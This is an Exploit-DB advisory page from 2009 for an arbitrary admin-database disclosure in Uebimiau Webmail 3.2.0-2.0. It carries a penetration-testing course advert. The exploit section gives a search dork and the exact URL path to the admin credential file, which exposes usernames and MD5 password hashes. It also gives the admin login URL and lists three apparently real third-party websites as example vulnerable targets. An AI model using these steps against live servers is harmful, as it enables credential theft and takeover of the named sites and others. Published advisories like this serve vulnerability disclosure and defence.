Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure

EDB-ID:

9493




Platform:

PHP

Date:

2009-08-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

##################################################
[+]Script Name : Uebimiau Webmail v3.2.0-2.0
[+]Bug Type : Arbitrary Admins Database Disclosure Vulnerability
[+]D0rk : "Uebimiau Webmail v3.2.0-2.0"
[+]Author : Septemb0x
[+]Greetz : BHDR & BARCOD3 & MUHADRAM  - Thanks : www.gonulerleri.org
[+]Note :  Tüm Müslüman Camiasına Hayırlı Ramazanlar Dilerim...
##################################################
[+]Examples :
 
1.  http://ifcacareer.com/mail/inc/database/system_admin/admin.ucf
2.  http://krunt.org/webmail/inc/database/system_admin/admin.ucf
3.  http://www.hostsalive.com/webmail/inc/database/system_admin/admin.ucf
##################################################
[+]EXPLOIT ; http://[Target]/[path]/inc/database/system_admin/admin.ucf
[+]GET ; username:password(md5)
[+]LOGIN ; http://[Target]/[path]/admin/login.php
##################################################

# milw0rm.com [2009-08-24]